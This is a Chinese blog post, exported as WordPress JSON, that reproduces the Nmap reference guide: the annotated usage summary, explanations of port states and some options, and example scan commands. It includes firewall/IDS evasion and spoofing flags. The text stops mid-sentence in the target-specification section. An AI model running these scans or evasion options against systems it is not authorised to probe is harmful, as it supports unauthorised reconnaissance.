﻿{"id":39,"date":"2020-05-28T02:33:10","date_gmt":"2020-05-27T18:33:10","guid":{"rendered":"https:\/\/byy3.com\/?p=39"},"modified":"2021-02-06T08:03:42","modified_gmt":"2021-02-06T00:03:42","slug":"nmap%e8%af%a6%e7%bb%86%e5%8f%82%e8%80%83%e6%8c%87%e5%8d%97","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=39","title":{"rendered":"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Nmap\u626b\u63cf\u539f\u7406\u4e0e\u7528\u6cd5\uff1a<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/blog.csdn.net\/aspirationflow\/article\/details\/7694274\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/blog.csdn.net\/aspirationflow\/article\/details\/7694274\" rel=\"nofollow\" >http:\/\/blog.csdn.net\/aspirationflow\/article\/details\/7694274<\/a><\/a><\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u901f\u67e5\u624b\u518c\uff1a<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/wooyun.tangscan.cn\/static\/drops\/tips-4333.html\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/wooyun.tangscan.cn\/static\/drops\/tips-4333.html\" rel=\"nofollow\" >http:\/\/wooyun.tangscan.cn\/static\/drops\/tips-4333.html<\/a><\/a><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u626b\u63cf\u795e\u5668nmap\u6700\u4f73\u5b9e\u8df5\u4f7f\u7528\uff1a<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/blog.csdn.net\/qq_29277155\/article\/details\/50971727\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/blog.csdn.net\/qq_29277155\/article\/details\/50971727\" rel=\"nofollow\" >http:\/\/blog.csdn.net\/qq_29277155\/article\/details\/50971727<\/a><\/a><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528nmap \u9a8c\u8bc1\u591a\u79cd\u6f0f\u6d1e\uff1a<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/blog.csdn.net\/jiangliuzheng\/article\/details\/51992220\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/blog.csdn.net\/jiangliuzheng\/article\/details\/51992220\" rel=\"nofollow\" >http:\/\/blog.csdn.net\/jiangliuzheng\/article\/details\/51992220<\/a><\/a><\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u5728nmap\u8fd0\u884c\u65f6\u76f4\u63a5\u6309\u952e\u76d8\u7684d\u952e\u6253\u201c\u65ad\u70b9\u201d\uff0c\u6309\u4e0bX\u952e\u53ef\u4ee5\u77e5\u9053\u8fd0\u884c\u7684\u8fdb\u5ea6<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>Nmap\u53c2\u8003\u6307\u5357(Man Page)<\/strong><\/p>\n\n\n<h1 class=\"wp-block-heading\">\u63cf\u8ff0<\/h1>\n\n\n<p class=\"wp-block-paragraph\">nmap \uff1a &nbsp;\u7f51\u7edc\u63a2\u6d4b\u5de5\u5177\u548c\u5b89\u5168\/\u7aef\u53e3\u626b\u63cf\u5668\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>nmap<\/code>\u00a0[\u00a0<code>&lt;\u626b\u63cf\u7c7b\u578b&gt;<\/code>\u00a0...] [\u00a0<code>&lt;\u9009\u9879&gt;<\/code>\u00a0] {\u00a0<code>&lt;\u626b\u63cf\u76ee\u6807\u8bf4\u660e&gt;<\/code>\u00a0}<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>nmap -T4 -A -p- 10.10.210.60<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; Nmap (\u201cNetwork Mapper(\u7f51\u7edc\u6620\u5c04\u5668)\u201d) \u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684 \u7f51\u7edc\u63a2\u6d4b\u548c\u5b89\u5168\u5ba1\u6838\u7684\u5de5\u5177\u3002\u5b83\u7684\u8bbe\u8ba1\u76ee\u6807\u662f\u5feb\u901f\u5730\u626b\u63cf\u5927\u578b\u7f51\u7edc\uff0c\u5f53\u7136\u7528\u5b83\u626b\u63cf\u5355\u4e2a \u4e3b\u673a\u4e5f\u6ca1\u6709\u95ee\u9898\u3002Nmap\u4ee5\u65b0\u9896\u7684\u65b9\u5f0f\u4f7f\u7528\u539f\u59cbIP\u62a5\u6587\u6765\u53d1\u73b0\u7f51\u7edc\u4e0a\u6709\u54ea\u4e9b\u4e3b\u673a\uff0c\u90a3\u4e9b \u4e3b\u673a\u63d0\u4f9b\u4ec0\u4e48\u670d\u52a1(\u5e94\u7528\u7a0b\u5e8f\u540d\u548c\u7248\u672c)\uff0c\u90a3\u4e9b\u670d\u52a1\u8fd0\u884c\u5728\u4ec0\u4e48\u64cd\u4f5c\u7cfb\u7edf(\u5305\u62ec\u7248\u672c\u4fe1\u606f)\uff0c \u5b83\u4eec\u4f7f\u7528\u4ec0\u4e48\u7c7b\u578b\u7684\u62a5\u6587\u8fc7\u6ee4\u5668\/\u9632\u706b\u5899\uff0c\u4ee5\u53ca\u4e00\u5806\u5176\u5b83\u529f\u80fd\u3002\u867d\u7136Nmap\u901a\u5e38\u7528\u4e8e\u5b89\u5168\u5ba1\u6838\uff0c \u8bb8\u591a\u7cfb\u7edf\u7ba1\u7406\u5458\u548c\u7f51\u7edc\u7ba1\u7406\u5458\u4e5f\u7528\u5b83\u6765\u505a\u4e00\u4e9b\u65e5\u5e38\u7684\u5de5\u4f5c\uff0c\u6bd4\u5982\u67e5\u770b\u6574\u4e2a\u7f51\u7edc\u7684\u4fe1\u606f\uff0c \u7ba1\u7406\u670d\u52a1\u5347\u7ea7\u8ba1\u5212\uff0c\u4ee5\u53ca\u76d1\u89c6\u4e3b\u673a\u548c\u670d\u52a1\u7684\u8fd0\u884c\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; Nmap\u8f93\u51fa\u7684\u662f\u626b\u63cf\u76ee\u6807\u7684\u5217\u8868\uff0c\u4ee5\u53ca\u6bcf\u4e2a\u76ee\u6807\u7684\u8865\u5145\u4fe1\u606f\uff0c\u81f3\u4e8e\u662f\u54ea\u4e9b\u4fe1\u606f\u5219\u4f9d\u8d56\u4e8e\u6240\u4f7f\u7528\u7684\u9009\u9879\u3002&nbsp;\u201c\u6240\u611f\u5174\u8da3\u7684\u7aef\u53e3\u8868\u683c\u201d\u662f\u5176\u4e2d\u7684\u5173\u952e\u3002\u90a3\u5f20\u8868\u5217\u51fa\u7aef\u53e3\u53f7\uff0c\u534f\u8bae\uff0c\u670d\u52a1\u540d\u79f0\u548c\u72b6\u6001\u3002\u72b6\u6001\u53ef\u80fd\u662f&nbsp;<code>open<\/code>(\u5f00\u653e\u7684)\uff0c<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684)\uff0c&nbsp;<code>closed<\/code>(\u5173\u95ed\u7684)\uff0c\u6216\u8005<code>unfiltered<\/code>(\u672a\u88ab\u8fc7\u6ee4\u7684)\u3002 Open(\u5f00\u653e\u7684)\u610f\u5473\u7740\u76ee\u6807\u673a\u5668\u4e0a\u7684\u5e94\u7528\u7a0b\u5e8f\u6b63\u5728\u8be5\u7aef\u53e3\u76d1\u542c\u8fde\u63a5\/\u62a5\u6587\u3002&nbsp;<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684) \u610f\u5473\u7740\u9632\u706b\u5899\uff0c\u8fc7\u6ee4\u5668\u6216\u8005\u5176\u5b83\u7f51\u7edc\u969c\u788d\u963b\u6b62\u4e86\u8be5\u7aef\u53e3\u88ab\u8bbf\u95ee\uff0cNmap\u65e0\u6cd5\u5f97\u77e5 \u5b83\u662f&nbsp;<code>open<\/code>(\u5f00\u653e\u7684) \u8fd8\u662f&nbsp;<code>closed<\/code>(\u5173\u95ed\u7684)\u3002<code>closed<\/code>(\u5173\u95ed\u7684) \u7aef\u53e3\u6ca1\u6709\u5e94\u7528\u7a0b\u5e8f\u5728\u5b83\u4e0a\u9762\u76d1\u542c\uff0c\u4f46\u662f\u4ed6\u4eec\u968f\u65f6\u53ef\u80fd\u5f00\u653e\u3002 \u5f53\u7aef\u53e3\u5bf9Nmap\u7684\u63a2\u6d4b\u505a\u51fa\u54cd\u5e94\uff0c\u4f46\u662fNmap\u65e0\u6cd5\u786e\u5b9a\u5b83\u4eec\u662f\u5173\u95ed\u8fd8\u662f\u5f00\u653e\u65f6\uff0c\u8fd9\u4e9b\u7aef\u53e3\u5c31\u88ab\u8ba4\u4e3a\u662f&nbsp;<code>unfiltered<\/code>(\u672a\u88ab\u8fc7\u6ee4\u7684) \u5982\u679cNmap\u62a5\u544a\u72b6\u6001\u7ec4\u5408&nbsp;<code>open|filtered<\/code>&nbsp;\u548c&nbsp;<code>closed|filtered<\/code>\u65f6\uff0c\u90a3\u8bf4\u660eNmap\u65e0\u6cd5\u786e\u5b9a\u8be5\u7aef\u53e3\u5904\u4e8e\u4e24\u4e2a\u72b6\u6001\u4e2d\u7684\u54ea\u4e00\u4e2a\u72b6\u6001\u3002 \u5f53\u8981\u6c42\u8fdb\u884c\u7248\u672c\u63a2\u6d4b\u65f6\uff0c\u7aef\u53e3\u8868\u4e5f\u53ef\u4ee5\u5305\u542b\u8f6f\u4ef6\u7684\u7248\u672c\u4fe1\u606f\u3002\u5f53\u8981\u6c42\u8fdb\u884cIP\u534f\u8bae\u626b\u63cf\u65f6 (<code>-sO<\/code>)\uff0cNmap\u63d0\u4f9b\u5173\u4e8e\u6240\u652f\u6301\u7684IP\u534f\u8bae\u800c\u4e0d\u662f\u6b63\u5728\u76d1\u542c\u7684\u7aef\u53e3\u7684\u4fe1\u606f\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; \u9664\u4e86\u6240\u611f\u5174\u8da3\u7684\u7aef\u53e3\u8868\uff0cNmap\u8fd8\u80fd\u63d0\u4f9b\u5173\u4e8e\u76ee\u6807\u673a\u7684\u8fdb\u4e00\u6b65\u4fe1\u606f\uff0c\u5305\u62ec\u53cd\u5411\u57df\u540d\uff0c\u64cd\u4f5c\u7cfb\u7edf\u731c\u6d4b\uff0c\u8bbe\u5907\u7c7b\u578b\uff0c\u548cMAC\u5730\u5740\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; \u4e00\u4e2a\u5178\u578b\u7684Nmap\u626b\u63cf\u5982<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nmap.org\/man\/zh\/index.html#man-ex-repscan\" rel=\"noreferrer noopener\" rel=\"nofollow\" >\u4f8b&nbsp;1 \u201c\u4e00\u4e2a\u5178\u578b\u7684Nmap\u626b\u63cf\u201d<\/a>\u6240\u793a\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u552f\u4e00\u7684\u9009\u9879\u662f<code>-A<\/code>\uff0c \u7528\u6765\u8fdb\u884c\u64cd\u4f5c\u7cfb\u7edf\u53ca\u5176\u7248\u672c\u7684\u63a2\u6d4b\uff0c<code>-T4<\/code>&nbsp;\u53ef\u4ee5\u52a0\u5feb\u6267\u884c\u901f\u5ea6\uff0c\u63a5\u7740\u662f\u4e24\u4e2a\u76ee\u6807\u4e3b\u673a\u540d\u3002<strong><strong>\u4e00\u4e2a\u5178\u578b\u7684Nmap\u626b\u63cf<\/strong><\/strong><\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170413171133920?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe\" \/><\/figure>\n\n\n<h1 class=\"wp-block-heading\">\u8bd1\u6ce8<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u8be5Nmap\u53c2\u8003\u6307\u5357\u4e2d\u6587\u7248\u7531Fei Yang&nbsp;<code>&lt;<a target=\"_blank\" href=\"mailto:fyang1024@gmail.com\" rel=\"noreferrer noopener\" rel=\"nofollow\" >fyang1024@gmail.com<\/a>&gt;<\/code>\u548cLei Li<code>&lt;<a target=\"_blank\" href=\"mailto:lilei_721@6611.org\" rel=\"noreferrer noopener\" rel=\"nofollow\" >lilei_721@6611.org<\/a>&gt;<\/code>&nbsp;\u4ece<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/man\/\" rel=\"noreferrer noopener\" rel=\"nofollow\" >\u82f1\u6587\u7248\u672c<\/a>\u7ffb\u8bd1\u800c\u6765\u3002 \u6211\u4eec\u5e0c\u671b\u8fd9\u5c06\u4f7f\u5168\u4e16\u754c\u4f7f\u7528\u4e2d\u6587\u7684\u4eba\u4eec\u66f4\u4e86\u89e3Nmap\uff0c\u4f46\u6211\u4eec\u4e0d\u80fd\u4fdd\u8bc1\u8be5\u8bd1\u672c\u548c\u5b98\u65b9\u7684 \u82f1\u6587\u7248\u672c\u4e00\u6837\u5b8c\u6574\uff0c\u4e5f\u4e0d\u80fd\u4fdd\u8bc1\u540c\u6b65\u66f4\u65b0\u3002 \u5b83\u53ef\u4ee5\u5728<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/creativecommons.org\/licenses\/by\/2.5\/\" rel=\"noreferrer noopener\" rel=\"nofollow\" >Creative Commons Attribution License<\/a>\u4e0b\u88ab\u4fee\u6539\u5e76\u91cd\u65b0\u53d1\u5e03\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">nmap&nbsp;\u9009\u9879\u6982\u8981<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u9009\u9879(Options)\u3002 \u5f53Nmap\u4e0d\u5e26\u9009\u9879\u8fd0\u884c\u65f6\uff0c\u8be5\u9009\u9879\u6982\u8981\u4f1a\u88ab\u8f93\u51fa\uff0c\u6700\u65b0\u7684\u7248\u672c\u5728\u8fd9\u91cc&nbsp;<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/data\/nmap.usage.txt\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/data\/nmap.usage.txt\" rel=\"nofollow\" >http:\/\/www.insecure.org\/nmap\/data\/nmap.usage.txt<\/a><\/a>\u3002 \u5b83\u5e2e\u52a9\u4eba\u4eec\u8bb0\u4f4f\u6700\u5e38\u7528\u7684\u9009\u9879\uff0c\u4f46\u4e0d\u80fd\u66ff\u4ee3\u672c\u624b\u518c\u5176\u4f59\u6df1\u5165\u7684\u6587\u6863\uff0c\u4e00\u4e9b\u6666\u6da9\u7684\u9009\u9879\u751a\u81f3\u4e0d\u5728\u8fd9\u91cc\u3002<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20180104230803023?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/SouthEast\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe1\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe1\" \/><\/figure>\n\n\n<pre class=\"wp-block-code\"><code>Nmap 7.25BETA1 ( https:\/\/nmap.org )\nUsage: nmap &#91;Scan Type(s)] &#91;Options] {target specification}\nTARGET SPECIFICATION: \u76ee\u6807\u8bf4\u660e\n Can pass hostnames, IP addresses, networks, etc.\n Ex: scanme.nmap.org, microsoft.com\/24, 192.168.0.1; 10.0.0-255.1-254\n -iL &lt;inputfilename>: Input from list of hosts\/networks\n -iR &lt;num hosts>: Choose random targets\n --exclude &lt;host1&#91;,host2]&#91;,host3],...>: Exclude hosts\/networks\n --excludefile &lt;exclude_file>: Exclude list from file\nHOST DISCOVERY: \u4e3b\u673a\u53d1\u73b0\uff08\u5c31\u662f\u626b\u63cf\u4e3b\u673a\u662f\u5426\u5b58\u6d3b\uff09\n -sL: List Scan - simply list targets to scan\n -sn: Ping Scan - disable port scan \/\/ \u7b49\u4ef7\u4e8e -sP \u53c2\u6570\u3002\u90fd\u662fping \u626b\u63cf\n -Pn: Treat all hosts as online -- skip host discovery \/\/-P0 (\u65e0Ping) \u548c -Pn \u53c2\u6570\u6548\u679c\u4e00\u6837\n -PS\/PA\/PU\/PY&#91;portlist]: TCP SYN\/ACK, UDP or SCTP discovery to given ports\n -PE\/PP\/PM: ICMP echo, timestamp, and netmask request discovery probes\n -PO&#91;protocol list]: IP Protocol Ping \/\/-P0 (\u65e0Ping) \u548c -Pn \u53c2\u6570\u6548\u679c\u4e00\u6837\n -n\/-R: Never do DNS resolution\/Always resolve &#91;default: sometimes]\n --dns-servers &lt;serv1&#91;,serv2],...>: Specify custom DNS servers\n --system-dns: Use OS's DNS resolver\n --traceroute: Trace hop path to each host\nSCAN TECHNIQUES: \u626b\u63cf\u6280\u672f\uff08\u5c31\u662f\u626b\u63cf\u5b58\u6d3b\u4e3b\u673a\u5f00\u4e86\u54ea\u4e9b\u7aef\u53e3\uff0c\u4ee5\u53ca\u7aef\u53e3\u4e0a\u542f\u7528\u7684\u670d\u52a1\uff09\n -sS\/sT\/sA\/sW\/sM: TCP SYN\/Connect()\/ACK\/Window\/Maimon scans\n -sU: UDP Scan\n -sN\/sF\/sX: TCP Null, FIN, and Xmas scans\n --scanflags &lt;flags>: Customize TCP scan flags\n -sI &lt;zombie host&#91;:probeport]>: Idle scan\n -sY\/sZ: SCTP INIT\/COOKIE-ECHO scans\n -sO: IP protocol scan\n -b &lt;FTP relay host>: FTP bounce scan\nPORT SPECIFICATION AND SCAN ORDER: \u7aef\u53e3\u8bc6\u522b \u548c \u626b\u63cf\u547d\u4ee4\n -p &lt;port ranges>: Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9\n --exclude-ports &lt;port ranges>: Exclude the specified ports from scanning\n -F: Fast mode - Scan fewer ports than the default scan\n -r: Scan ports consecutively - don't randomize\n --top-ports &lt;number>: Scan &lt;number> most common ports\n --port-ratio &lt;ratio>: Scan ports more common than &lt;ratio>\nSERVICE\/VERSION DETECTION: \u7aef\u53e3\u7684\u670d\u52a1\u4ee5\u53ca\u670d\u52a1\u7248\u672c \u68c0\u6d4b\n -sV: Probe open ports to determine service\/version info\n --version-intensity &lt;level>: Set from 0 (light) to 9 (try all probes)\n --version-light: Limit to most likely probes (intensity 2)\n --version-all: Try every single probe (intensity 9)\n --version-trace: Show detailed version scan activity (for debugging)\nSCRIPT SCAN: \u811a\u672c\u626b\u63cf\n -sC: equivalent to --script=default\n --script=&lt;Lua scripts>: &lt;Lua scripts> is a comma separated list of\n directories, script-files or script-categories\n --script-args=&lt;n1=v1,&#91;n2=v2,...]>: provide arguments to scripts\n --script-args-file=filename: provide NSE script args in a file\n --script-trace: Show all data sent and received\n --script-updatedb: Update the script database.\n --script-help=&lt;Lua scripts>: Show help about scripts.\n &lt;Lua scripts> is a comma-separated list of script-files or\n script-categories.\nOS DETECTION: \u64cd\u4f5c\u7cfb\u7edf \u63a2\u6d4b\n -O: Enable OS detection\n --osscan-limit: Limit OS detection to promising targets\n --osscan-guess: Guess OS more aggressively\nTIMING AND PERFORMANCE: \u65f6\u95f4\u548c\u6027\u80fd\n Options which take &lt;time> are in seconds, or append 'ms' (milliseconds),\n 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).\n -T&lt;0-5>: Set timing template (higher is faster)\n --min-hostgroup\/max-hostgroup &lt;size>: Parallel host scan group sizes\n --min-parallelism\/max-parallelism &lt;numprobes>: Probe parallelization\n --min-rtt-timeout\/max-rtt-timeout\/initial-rtt-timeout &lt;time>: Specifies\n probe round trip time.\n --max-retries &lt;tries>: Caps number of port scan probe retransmissions.\n --host-timeout &lt;time>: Give up on target after this long\n --scan-delay\/--max-scan-delay &lt;time>: Adjust delay between probes\n --min-rate &lt;number>: Send packets no slower than &lt;number> per second\n --max-rate &lt;number>: Send packets no faster than &lt;number> per second\nFIREWALL\/IDS EVASION AND SPOOFING: \u9632\u706b\u5899\/IDS \u9003\u907f\u548c\u6b3a\u9a97\n -f; --mtu &lt;val>: fragment packets (optionally w\/given MTU)\n -D &lt;decoy1,decoy2&#91;,ME],...>: Cloak a scan with decoys\n -S &lt;IP_Address>: Spoof source address\n -e &lt;iface>: Use specified interface\n -g\/--source-port &lt;portnum>: Use given port number\n --proxies &lt;url1,&#91;url2],...>: Relay connections through HTTP\/SOCKS4 proxies\n --data &lt;hex string>: Append a custom payload to sent packets\n --data-string &lt;string>: Append a custom ASCII string to sent packets\n --data-length &lt;num>: Append random data to sent packets\n --ip-options &lt;options>: Send packets with specified ip options\n --ttl &lt;val>: Set IP time-to-live field\n --spoof-mac &lt;mac address\/prefix\/vendor name>: Spoof your MAC address\n --badsum: Send packets with a bogus TCP\/UDP\/SCTP checksum\nOUTPUT: \u8f93\u51fa\n -oN\/-oX\/-oS\/-oG &lt;file>: Output scan in normal, XML, s|&lt;rIpt kIddi3,\n and Grepable format, respectively, to the given filename.\n -oA &lt;basename>: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)\n -d: Increase debugging level (use -dd or more for greater effect)\n --reason: Display the reason a port is in a particular state\n --open: Only show open (or possibly open) ports\n --packet-trace: Show all packets sent and received\n --iflist: Print host interfaces and routes (for debugging)\n --append-output: Append to rather than clobber specified output files\n --resume &lt;filename>: Resume an aborted scan\n --stylesheet &lt;path\/URL>: XSL stylesheet to transform XML output to HTML\n --webxml: Reference stylesheet from Nmap.Org for more portable XML\n --no-stylesheet: Prevent associating of XSL stylesheet w\/XML output\nMISC: \u6df7\u6742\n -6: Enable IPv6 scanning\n -A: Enable OS detection, version detection, script scanning, and traceroute \/\/ -A\u662fnmap\u5168\u9762\u626b\u63cf\u9009\u9879\u3002\u6709\u53eb\u603b\u548c\u626b\u63cf\uff0c\u662f\u4e00\u79cd\u5b8c\u6574\u626b\u63cf\u76ee\u6807\u7684\u65b9\u5f0f\n --datadir &lt;dirname>: Specify custom Nmap data file location\n --send-eth\/--send-ip: Send using raw ethernet frames or IP packets\n --privileged: Assume that the user is fully privileged\n --unprivileged: Assume the user lacks raw socket privileges\n -V: Print version number\n -h: Print this help summary page.\nEXAMPLES: \u4f8b\u5b50\n nmap -v -A scanme.nmap.org\n nmap -v -sn 192.168.0.0\/16 10.0.0.0\/8\n nmap -v -iR 10000 -Pn -p 80\nSEE THE MAN PAGE (https:\/\/nmap.org\/book\/man.html) FOR MORE OPTIONS AND EXAMPLES \/\/nmap man \u624b\u518c\u5730\u5740<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u8fd8\u63d0\u4f9b\u4e86\u65e0\u6570\u9009\u9879\u3002\u6709\u4e00\u4e2a\u662f&quot;-PT&quot;,\uff0c\u6211\u4eec\u5df2\u7ecf\u4ecb\u7ecd\u8fc7\u4e86\u3002\u5728\u76ee\u6807\u673a\u6216\u7f51\u7edc\u4e0a\u5e38\u89c1\u7684\u672a\u7ecf\u8fc7\u6ee4\u7684\u7aef\u53e3\uff0c\u8fdb\u884cTCP &quot;ping&quot;\u626b\u63cf\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u53e6\u4e00\u4e2a\u9009\u9879\u662f&quot;-P0&quot;\u3002\u5728\u7f3a\u7701\u8bbe\u7f6e\u4e0b\u8bd5\u56fe\u626b\u63cf\u4e00\u4e2a\u7aef\u53e3\u4e4b\u524d\uff0cNmap\u5c06\u7528TCP ping&quot; \u548c ICMPecho\u547d\u4ee4ping\u4e00\u4e2a\u76ee\u6807\u673a\uff0c\u5982\u679cICMP\u548cTCP\u7684\u63a2\u6d4b\u626b\u63cf\u5f97\u4e0d\u5230\u54cd\u5e94\uff0c\u76ee\u6807\u4e3b\u673a\u6216\u7f51\u7edc\u5c31\u4e0d\u4f1a\u88ab\u626b\u63cf\uff0c\u5373\u4f7f\u4ed6\u4eec\u662f\u8fd0\u884c\u7740\u7684\u3002\u800c&quot;-P0&quot;\u9009\u9879\u5141\u8bb8\u5728\u626b\u63cf\u4e4b\u524d\u4e0d\u8fdb\u884cping\uff0c\u5373\u53ef\u8fdb\u884c\u626b\u63cf\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f60\u5e94\u8be5\u4e60\u60ef\u4f7f\u7528&quot;-v&quot;\u547d\u4ee4\uff0c\u5b83\u8be6\u7ec6\u5217\u51fa\u6240\u6709\u4fe1\u606f\uff0c\u80fd\u548c\u6240\u6709\u7684\u626b\u63cf\u9009\u9879\u4e00\u8d77\u4f7f\u7528\u3002\u4f60\u80fd\u53cd\u590d\u5730\u4f7f\u7528\u8fd9\u4e2a\u9009\u9879\uff0c\u83b7\u5f97\u6709\u5173\u76ee\u6807\u673a\u7684\u66f4\u591a\u4fe1\u606f\u3002<br>\u4f7f\u7528&quot;-p &quot;\u9009\u9879\uff0c\u53ef\u4ee5\u6307\u5b9a\u626b\u63cf\u7aef\u53e3\u3002\u6bd4\u5982 \uff0c\u653b\u51fb\u8005\u60f3\u63a2\u6d4b\u4f60\u7684web\u670d\u52a1\u5668\u7684ftp\uff08port 21\uff09\uff0ctelnet (port 23), dns (port 53), http (port 80),\u60f3\u77e5\u9053\u4f60\u6240\u4f7f\u7528\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5b83\u5c06\u4f7f\u7528SYN\u626b\u63cf\u3002<\/p>\n\n\n<h1>nmap -sS -p 21,23,53,80 -O -v www.yourserver.com<br>\u5c0f\u7ed3\uff1a<br>\u4f7f\u7528\u4ec0\u4e48\u6837\u7684\u65b9\u6cd5\u6765\u62b5\u5236\u4e00\u4e2a\u9ed1\u5ba2\u4f7f\u7528Nmap\uff0c\u8fd9\u6837\u7684\u5de5\u5177\u662f\u6709\u7684\uff0c\u6bd4\u5982 Scanlogd, Courtney, and Shadow;\uff0c\u7136\u800c\u4f7f\u7528\u8fd9\u6837\u7684\u5de5\u5177\u5e76\u4e0d\u80fd\u4ee3\u66ff\u7f51\u7edc\u5b89\u5168\u7ba1\u7406\u5458\u3002\u56e0\u4e3a\u626b\u63cf\u53ea\u662f\u653b\u51fb\u7684\u524d\u671f\u51c6\u5907\uff0c\u7ad9\u70b9\u4f7f\u7528\u5b83\u53ea\u53ef\u4ee5\u8fdb\u884c\u4e25\u5bc6\u7684\u76d1\u89c6\u3002<br>\u4f7f\u7528Nmap\u76d1\u89c6\u81ea\u5df1\u7684\u7ad9\u70b9\uff0c\u7cfb\u7edf\u548c\u7f51\u7edc\u7ba1\u7406\u5458\u80fd\u53d1\u73b0\u6f5c\u5728\u5165\u4fb5\u8005\u5bf9\u4f60\u7684\u7cfb\u7edf\u7684\u63a2\u6d4b\u3002<\/h1>\n\n\n<h1 class=\"wp-block-heading\">\u76ee\u6807\u8bf4\u660e<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u9009\u9879\uff0c\u6240\u6709\u51fa\u73b0\u5728Nmap\u547d\u4ee4\u884c\u4e0a\u7684\u90fd\u88ab\u89c6\u4e3a\u5bf9\u76ee\u6807\u4e3b\u673a\u7684\u8bf4\u660e\u3002 \u6700\u7b80\u5355\u7684\u60c5\u51b5\u662f\u6307\u5b9a\u4e00\u4e2a\u76ee\u6807IP\u5730\u5740\u6216\u4e3b\u673a\u540d\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6709\u65f6\u5019\u60a8\u5e0c\u671b\u626b\u63cf\u6574\u4e2a\u7f51\u7edc\u7684\u76f8\u90bb\u4e3b\u673a\u3002\u4e3a\u6b64\uff0cNmap\u652f\u6301CIDR\u98ce\u683c\u7684\u5730\u5740\u3002\u60a8\u53ef\u4ee5\u9644\u52a0 \u4e00\u4e2a\/<em><code>&lt;numbit&gt;<\/code><\/em>\u5728\u4e00\u4e2aIP\u5730\u5740\u6216\u4e3b\u673a\u540d\u540e\u9762\uff0c Nmap\u5c06\u4f1a\u626b\u63cf\u6240\u6709\u548c\u8be5\u53c2\u8003IP\u5730\u5740\u5177\u6709&nbsp;<em><code>&lt;numbit&gt;<\/code><\/em>\u76f8\u540c\u6bd4\u7279\u7684\u6240\u6709IP\u5730\u5740\u6216\u4e3b\u673a\u3002 \u4f8b\u5982\uff0c192.168.10.0\/24\u5c06\u4f1a\u626b\u63cf192.168.10.0 (\u4e8c\u8fdb\u5236\u683c\u5f0f:&nbsp;<code>11000000 10101000 00001010 00000000<\/code>)\u548c192.168.10.255 